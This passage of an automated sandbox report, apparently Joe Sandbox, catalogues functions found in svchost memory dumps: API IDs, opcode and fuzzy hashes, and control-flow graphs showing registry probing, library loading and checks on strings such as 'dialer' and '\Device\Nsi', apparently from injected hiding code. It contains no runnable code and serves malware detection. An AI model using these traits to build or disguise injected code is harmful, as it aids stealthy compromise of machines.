                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: bccd00bc8ab946f2a7b3db10561d6faefaadadcbeac60e70ee9170717d64805b
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: CCE09222700591D3EF0ADB55F6483E422219F86744F5E9123B559862A6CEB8CA878347
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: bea6201ef47db569c32ae2d01dc7223a37915656bc2f8caf1476e1f29271613b
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: C5218822B14B908ADB51CF5DE90425AF3A0FB96B94F494120EE8D8BF24FE78C6468701
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: 1489f59ea2ff4b37f82ce32a23e64d08b0b790b90b84a247d5985319c3d73736
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: C0E03971B21610CBE744CB6ADC0834937E1EB9AB01F888024C90947750EF7D8599C741

                                                                                Execution Graph

                                                                                Execution Coverage:0.6%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:83
                                                                                Total number of Limit Nodes:5
                                                                                execution_graph 21087 2c9afbb1c28 21093 2c9afbb1650 GetProcessHeap 21087->21093 21089 2c9afbb1c3e Sleep SleepEx 21091 2c9afbb1c37 21089->21091 21091->21089 21092 2c9afbb15c0 StrCmpIW StrCmpW 21091->21092 21138 2c9afbb18dc 9 API calls 21091->21138 21092->21091 21094 2c9afbb1670 _invalid_parameter_noinfo 21093->21094 21139 2c9afbb1274 GetProcessHeap 21094->21139 21096 2c9afbb1678 21097 2c9afbb1274 2 API calls 21096->21097 21098 2c9afbb1689 21097->21098 21099 2c9afbb1274 2 API calls 21098->21099 21100 2c9afbb1692 21099->21100 21101 2c9afbb1274 2 API calls 21100->21101 21102 2c9afbb169b 21101->21102 21103 2c9afbb16b6 RegOpenKeyExW 21102->21103 21104 2c9afbb16e8 RegOpenKeyExW 21103->21104 21105 2c9afbb18ce 21103->21105 21106 2c9afbb1711 21104->21106 21107 2c9afbb1727 RegOpenKeyExW 21104->21107 21105->21091 21143 2c9afbb12c8 11 API calls 2 library calls 21106->21143 21109 2c9afbb1762 RegOpenKeyExW 21107->21109 21110 2c9afbb174b 21107->21110 21112 2c9afbb1786 21109->21112 21113 2c9afbb179d RegOpenKeyExW 21109->21113 21144 2c9afbb104c 4 API calls 2 library calls 21110->21144 21145 2c9afbb12c8 11 API calls 2 library calls 21112->21145 21117 2c9afbb17c1 21113->21117 21118 2c9afbb17d8 RegOpenKeyExW 21113->21118 21114 2c9afbb171d RegCloseKey 21114->21107 21115 2c9afbb1758 RegCloseKey 21115->21109 21146 2c9afbb12c8 11 API calls 2 library calls 21117->21146 21121 2c9afbb1813 RegOpenKeyExW 21118->21121 21122 2c9afbb17fc 21118->21122 21119 2c9afbb1793 RegCloseKey 21119->21113 21125 2c9afbb1837 21121->21125 21126 2c9afbb184e RegOpenKeyExW 21121->21126 21147 2c9afbb12c8 11 API calls 2 library calls 21122->21147 21123 2c9afbb17ce RegCloseKey 21123->21118 21148 2c9afbb104c 4 API calls 2 library calls 21125->21148 21128 2c9afbb1872 21126->21128 21129 2c9afbb1889 RegOpenKeyExW 21126->21129 21149 2c9afbb104c 4 API calls 2 library calls 21128->21149 21133 2c9afbb18c4 RegCloseKey 21129->21133 21134 2c9afbb18ad 21129->21134 21130 2c9afbb1809 RegCloseKey 21130->21121 21131 2c9afbb1844 RegCloseKey 21131->21126 21133->21105 21150 2c9afbb104c 4 API calls 2 library calls 21134->21150 21135 2c9afbb187f RegCloseKey 21135->21129 21137 2c9afbb18ba RegCloseKey 21137->21133 21151 2c9afbc3170 21139->21151 21142 2c9afbb12ba _invalid_parameter_noinfo 21142->21096 21143->21114 21144->21115 21145->21119 21146->21123 21147->21130 21148->21131 21149->21135 21150->21137 21152 2c9afbb128f GetProcessHeap 21151->21152 21152->21142 21153 2c9afbba568 21154 2c9afbba581 21153->21154 21155 2c9afbba57d 21153->21155 21165 2c9afbbcc38 15 API calls 21154->21165 21157 2c9afbba586 21166 2c9afbbd130 GetEnvironmentStringsW 21157->21166 21160 2c9afbba593 21180 2c9afbbb8d8 GetProcAddress __free_lconv_mon _set_errno_from_matherr 21160->21180 21162 2c9afbba5a0 21179 2c9afbbb8d8 GetProcAddress __free_lconv_mon _set_errno_from_matherr 21162->21179 21165->21157 21167 2c9afbbd15e 21166->21167 21177 2c9afbbd200 21166->21177 21181 2c9afbbd080 WideCharToMultiByte 21167->21181 21168 2c9afbba58b 21168->21160 21178 2c9afbba5d4 7 API calls 3 library calls 21168->21178 21169 2c9afbbd20a FreeEnvironmentStringsW 21169->21168 21171 2c9afbbd1b0 21171->21177 21182 2c9afbbae0c GetProcAddress _invalid_parameter_noinfo _set_errno_from_matherr 21171->21182 21173 2c9afbbd1bf 21174 2c9afbbd1e9 21173->21174 21183 2c9afbbd080 WideCharToMultiByte 21173->21183 21184 2c9afbbb8d8 GetProcAddress __free_lconv_mon _set_errno_from_matherr 21174->21184 21177->21168 21177->21169 21178->21162 21179->21160 21180->21155 21181->21171 21182->21173 21183->21174 21184->21177 21185 2c9afb82908 21187 2c9afb82936 21185->21187 21186 2c9afb82a2b LoadLibraryA 21186->21187 21187->21186 21188 2c9afb82aa7 21187->21188 21189 2c9b029b860 21190 2c9b029b871 _invalid_parameter_noinfo 21189->21190 21192 2c9b029b8c0 21190->21192 21193 2c9b029b840 TlsGetValue _invalid_parameter_noinfo 21190->21193 21193->21192

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: 766397841229deff3997cb20636aa2421473b3c43feb979f59d95bd74ba3d030
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: EAE0C9726116008AF7049B66D81C75B76F1EB8DF51F898024CA4907390DF7E84DAC750

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: 2e09a90fef0a02900b9e2d45880fe9ec0c3f089394a79b96f90f118b813c174c
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: 0511697361061182FB25A721B84EFAF62B0FB98304F4C00399A0EC95E4EF7FC1C98250

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free
                                                                                • String ID:
                                                                                • API String ID: 3328510275-0
                                                                                • Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                                                • Instruction ID: 116c1604d94c425c91a47476faa9b8083e13afd7474f70d43df7aa98e8733753
                                                                                • Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                                                • Instruction Fuzzy Hash: 57217122B04B9085F6209F16A40C71EA6B4FB88BD0F484135DE9E67BD8DF3DC4928300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000002C9AFBB1650: GetProcessHeap.KERNEL32 ref: 000002C9AFBB165B
                                                                                  • Part of subcall function 000002C9AFBB1650: HeapAlloc.KERNEL32 ref: 000002C9AFBB166A
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB16DA
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1707
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1721
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1741
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB175C
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB177C
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1797
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB17B7
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB17D2
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB17F2
                                                                                • Sleep.KERNEL32 ref: 000002C9AFBB1C43
                                                                                • SleepEx.KERNELBASE ref: 000002C9AFBB1C49
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB180D
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB182D
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1848
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1868
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1883
                                                                                  • Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB18A3
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB18BE
                                                                                  • Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB18C8
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: 44dab61989fdeb07f005ef60bc0a6f22da1cbd28f55a99c0858aa6a4822707b3
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: 0031EE27300A0595FB50AF36DA6DB5E12B8AB44BC0F145431DE0D877F6EE66C8E18350

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 2c9afbb3930-2c9afbb393b 86 2c9afbb3955-2c9afbb395c 85->86 87 2c9afbb393d-2c9afbb3950 StrCmpNIW 85->87 87->86 88 2c9afbb3952 87->88 88->86
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction ID: fe9029ee0210df7542c68caaeef988e2e22c2be57b4b50ee1bebc20be752b58b
                                                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                • Instruction Fuzzy Hash: 30D0A76631130B86FF14DFA1C8DDB6D6374EB08704F8C8030CA0A46194D71A8DCEC710

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 89 2c9afb82908-2c9afb82973 call 2c9afb80f34 * 4 98 2c9afb82979-2c9afb8297c 89->98 99 2c9afb82b8b 89->99 98->99 101 2c9afb82982-2c9afb82985 98->101 100 2c9afb82b8d-2c9afb82ba9 99->100 101->99 102 2c9afb8298b-2c9afb8298e 101->102 102->99 103 2c9afb82994-2c9afb829b2 102->103 103->99 105 2c9afb829b8-2c9afb829dc call 2c9afb80d6c 103->105 108 2c9afb82a0b-2c9afb82a12 105->108 109 2c9afb829de-2c9afb82a09 call 2c9afb80d6c 105->109 111 2c9afb82ab2-2c9afb82ab9 108->111 112 2c9afb82a18-2c9afb82a25 108->112 109->108 113 2c9afb82b6c-2c9afb82b89 111->113 114 2c9afb82abf-2c9afb82ad6 111->114 112->111 116 2c9afb82a2b-2c9afb82a39 LoadLibraryA 112->116 113->100 114->113 117 2c9afb82adc 114->117 118 2c9afb82a3b-2c9afb82a45 116->118 119 2c9afb82a9d-2c9afb82aa5 116->119 121 2c9afb82ae2-2c9afb82af7 117->121 122 2c9afb82a48-2c9afb82a4c 118->122 119->116 123 2c9afb82aa7-2c9afb82aac 119->123 124 2c9afb82af9-2c9afb82b0a 121->124 125 2c9afb82b5b-2c9afb82b66 121->125 126 2c9afb82a9a 122->126 127 2c9afb82a4e-2c9afb82a52 122->127 123->111 129 2c9afb82b15-2c9afb82b19 124->129 130 2c9afb82b0c-2c9afb82b13 124->130 125->113 125->121 126->119 131 2c9afb82a54-2c9afb82a7b 127->131 132 2c9afb82a7d-2c9afb82a87 127->132 134 2c9afb82b24-2c9afb82b28 129->134 135 2c9afb82b1b-2c9afb82b22 129->135 133 2c9afb82b48-2c9afb82b59 130->133 136 2c9afb82a8d-2c9afb82a98 131->136 132->136 133->124 133->125 137 2c9afb82b3a-2c9afb82b3e 134->137 138 2c9afb82b2a-2c9afb82b38 134->138 135->133 136->122 137->133 139 2c9afb82b40-2c9afb82b43 137->139 138->133 139->133
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: a1e8b7bae66d26cfd0a2895eb84072785b4596e41535b19ab73168f5483cc84a
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: 79611F6770265187FF68CF29D44CB6CB3A1FBA4BA4F548021DA1D07785DB3AE892C740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                • Instruction ID: fe87d2f0bc43995259f2fec5df68e5585e8ca395446ac2627f191c2c84c087e0
                                                                                • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                • Instruction Fuzzy Hash: 6CF04FD8302E85A0FF56EBA1B65DBAD42887F4CB48F086430890A462C1DE1CCCCDC190

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 456 2c9b0292cdc-2c9b0292d55 call 2c9b02aecc0 459 2c9b0292d5b-2c9b0292d61 456->459 460 2c9b0293090-2c9b02930b3 456->460 459->460 461 2c9b0292d67-2c9b0292d6a 459->461 461->460 462 2c9b0292d70-2c9b0292d73 461->462 462->460 463 2c9b0292d79-2c9b0292d89 GetModuleHandleA 462->463 464 2c9b0292d8b-2c9b0292d9b call 2c9b02a3090 463->464 465 2c9b0292d9d 463->465 467 2c9b0292da0-2c9b0292dbe 464->467 465->467 467->460 470 2c9b0292dc4-2c9b0292de3 StrCmpNIW 467->470 470->460 471 2c9b0292de9-2c9b0292ded 470->471 471->460 472 2c9b0292df3-2c9b0292dfd 471->472 472->460 473 2c9b0292e03-2c9b0292e0a 472->473 473->460 474 2c9b0292e10-2c9b0292e23 473->474 475 2c9b0292e33 474->475 476 2c9b0292e25-2c9b0292e31 474->476 477 2c9b0292e36-2c9b0292e3a 475->477 476->477 478 2c9b0292e4a 477->478 479 2c9b0292e3c-2c9b0292e48 477->479 480 2c9b0292e4d-2c9b0292e57 478->480 479->480 481 2c9b0292f4d-2c9b0292f51 480->481 482 2c9b0292e5d-2c9b0292e60 480->482 483 2c9b0293082-2c9b029308a 481->483 484 2c9b0292f57-2c9b0292f5a 481->484 485 2c9b0292e72-2c9b0292e7c 482->485 486 2c9b0292e62-2c9b0292e6f call 2c9b0291a14 482->486 483->460 483->474 487 2c9b0292f5c-2c9b0292f68 call 2c9b0291a14 484->487 488 2c9b0292f6b-2c9b0292f75 484->488 490 2c9b0292e7e-2c9b0292e8b 485->490 491 2c9b0292eb0-2c9b0292eba 485->491 486->485 487->488 496 2c9b0292fa5-2c9b0292fa8 488->496 497 2c9b0292f77-2c9b0292f84 488->497 490->491 492 2c9b0292e8d-2c9b0292e9a 490->492 493 2c9b0292eea-2c9b0292eed 491->493 494 2c9b0292ebc-2c9b0292ec9 491->494 501 2c9b0292e9d-2c9b0292ea3 492->501 503 2c9b0292efb-2c9b0292f08 lstrlenW 493->503 504 2c9b0292eef-2c9b0292ef9 call 2c9b0291d28 493->504 494->493 502 2c9b0292ecb-2c9b0292ed8 494->502 499 2c9b0292fb5-2c9b0292fc2 lstrlenW 496->499 500 2c9b0292faa-2c9b0292fb3 call 2c9b0291d28 496->500 497->496 506 2c9b0292f86-2c9b0292f93 497->506 510 2c9b0292fc4-2c9b0292fce 499->510 511 2c9b0292fe5-2c9b0292fef call 2c9b0293930 499->511 500->499 525 2c9b0292ffa-2c9b0293005 500->525 508 2c9b0292f43-2c9b0292f48 501->508 509 2c9b0292ea9-2c9b0292eae 501->509 512 2c9b0292edb-2c9b0292ee1 502->512 514 2c9b0292f0a-2c9b0292f14 503->514 515 2c9b0292f2b-2c9b0292f3d call 2c9b0293930 503->515 504->503 504->508 516 2c9b0292f96-2c9b0292f9c 506->516 519 2c9b0292ff2-2c9b0292ff4 508->519 509->491 509->501 510->511 520 2c9b0292fd0-2c9b0292fe3 call 2c9b0291554 510->520 511->519 512->508 521 2c9b0292ee3-2c9b0292ee8 512->521 514->515 524 2c9b0292f16-2c9b0292f29 call 2c9b0291554 514->524 515->508 515->519 516->525 526 2c9b0292f9e-2c9b0292fa3 516->526 519->483 519->525 520->511 520->525 521->493 521->512 524->508 524->515 530 2c9b0293007-2c9b029300b 525->530 531 2c9b029307c-2c9b0293080 525->531 526->496 526->516 535 2c9b0293013-2c9b029302d call 2c9b02986a0 530->535 536 2c9b029300d-2c9b0293011 530->536 531->483 538 2c9b0293030-2c9b0293033 535->538 536->535 536->538 540 2c9b0293056-2c9b0293059 538->540 541 2c9b0293035-2c9b0293053 call 2c9b02986a0 538->541 540->531 543 2c9b029305b-2c9b0293079 call 2c9b02986a0 540->543 541->540 543->531
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: 8daa5c17ed907ff135c4472e0134d8eb5c079b29f538e1a68526cbd000814573
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: C3B15CA2210ED4A1FB55DF25E44CBAD73A4F784B88F546026EE4953B94DE35CDC8C380

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 367 2c9afbb2cdc-2c9afbb2d55 call 2c9afbcecc0 370 2c9afbb2d5b-2c9afbb2d61 367->370 371 2c9afbb3090-2c9afbb30b3 367->371 370->371 372 2c9afbb2d67-2c9afbb2d6a 370->372 372->371 373 2c9afbb2d70-2c9afbb2d73 372->373 373->371 374 2c9afbb2d79-2c9afbb2d89 GetModuleHandleA 373->374 375 2c9afbb2d8b-2c9afbb2d9b GetProcAddress 374->375 376 2c9afbb2d9d 374->376 377 2c9afbb2da0-2c9afbb2dbe 375->377 376->377 377->371 379 2c9afbb2dc4-2c9afbb2de3 StrCmpNIW 377->379 379->371 380 2c9afbb2de9-2c9afbb2ded 379->380 380->371 381 2c9afbb2df3-2c9afbb2dfd 380->381 381->371 382 2c9afbb2e03-2c9afbb2e0a 381->382 382->371 383 2c9afbb2e10-2c9afbb2e23 382->383 384 2c9afbb2e33 383->384 385 2c9afbb2e25-2c9afbb2e31 383->385 386 2c9afbb2e36-2c9afbb2e3a 384->386 385->386 387 2c9afbb2e3c-2c9afbb2e48 386->387 388 2c9afbb2e4a 386->388 389 2c9afbb2e4d-2c9afbb2e57 387->389 388->389 390 2c9afbb2f4d-2c9afbb2f51 389->390 391 2c9afbb2e5d-2c9afbb2e60 389->391 394 2c9afbb3082-2c9afbb308a 390->394 395 2c9afbb2f57-2c9afbb2f5a 390->395 392 2c9afbb2e72-2c9afbb2e7c 391->392 393 2c9afbb2e62-2c9afbb2e6f call 2c9afbb1a14 391->393 397 2c9afbb2eb0-2c9afbb2eba 392->397 398 2c9afbb2e7e-2c9afbb2e8b 392->398 393->392 394->371 394->383 399 2c9afbb2f5c-2c9afbb2f68 call 2c9afbb1a14 395->399 400 2c9afbb2f6b-2c9afbb2f75 395->400 405 2c9afbb2ebc-2c9afbb2ec9 397->405 406 2c9afbb2eea-2c9afbb2eed 397->406 398->397 404 2c9afbb2e8d-2c9afbb2e9a 398->404 399->400 401 2c9afbb2f77-2c9afbb2f84 400->401 402 2c9afbb2fa5-2c9afbb2fa8 400->402 401->402 411 2c9afbb2f86-2c9afbb2f93 401->411 412 2c9afbb2fb5-2c9afbb2fc2 lstrlenW 402->412 413 2c9afbb2faa-2c9afbb2fb3 call 2c9afbb1d28 402->413 414 2c9afbb2e9d-2c9afbb2ea3 404->414 405->406 415 2c9afbb2ecb-2c9afbb2ed8 405->415 408 2c9afbb2efb-2c9afbb2f08 lstrlenW 406->408 409 2c9afbb2eef-2c9afbb2ef9 call 2c9afbb1d28 406->409 417 2c9afbb2f2b-2c9afbb2f3d call 2c9afbb3930 408->417 418 2c9afbb2f0a-2c9afbb2f14 408->418 409->408 421 2c9afbb2f43-2c9afbb2f48 409->421 419 2c9afbb2f96-2c9afbb2f9c 411->419 423 2c9afbb2fc4-2c9afbb2fce 412->423 424 2c9afbb2fe5-2c9afbb2fef call 2c9afbb3930 412->424 413->412 429 2c9afbb2ffa-2c9afbb3005 413->429 414->421 422 2c9afbb2ea9-2c9afbb2eae 414->422 425 2c9afbb2edb-2c9afbb2ee1 415->425 417->421 433 2c9afbb2ff2-2c9afbb2ff4 417->433 418->417 428 2c9afbb2f16-2c9afbb2f29 call 2c9afbb1554 418->428 419->429 430 2c9afbb2f9e-2c9afbb2fa3 419->430 421->433 422->397 422->414 423->424 434 2c9afbb2fd0-2c9afbb2fe3 call 2c9afbb1554 423->434 424->433 425->421 435 2c9afbb2ee3-2c9afbb2ee8 425->435 428->417 428->421 437 2c9afbb3007-2c9afbb300b 429->437 438 2c9afbb307c-2c9afbb3080 429->438 430->402 430->419 433->394 433->429 434->424 434->429 435->406 435->425 442 2c9afbb3013-2c9afbb302d call 2c9afbb86a0 437->442 443 2c9afbb300d-2c9afbb3011 437->443 438->394 446 2c9afbb3030-2c9afbb3033 442->446 443->442 443->446 449 2c9afbb3056-2c9afbb3059 446->449 450 2c9afbb3035-2c9afbb3053 call 2c9afbb86a0 446->450 449->438 452 2c9afbb305b-2c9afbb3079 call 2c9afbb86a0 449->452 450->449 452->438
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: cee1f624c99506b22f5a284cb5384617d4f19eae6fa38f3370feaf50b79cd7dc
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: C0B18E63210A9082FB669F25D45CBAEA3B4FB44B85F58502AEE4D53B94DF36CDC1C340
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID: ec
                                                                                • API String ID: 1239891234-2323562846
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 6d1575f634b91f9ef913a1182f5a7881d3cb9ce6c09c0a87002a8eab4f8be338
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: 33315F76204FC096EB60CF25E84C79E73A4F789758F541125EA9D43B99DF38C989CB80
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
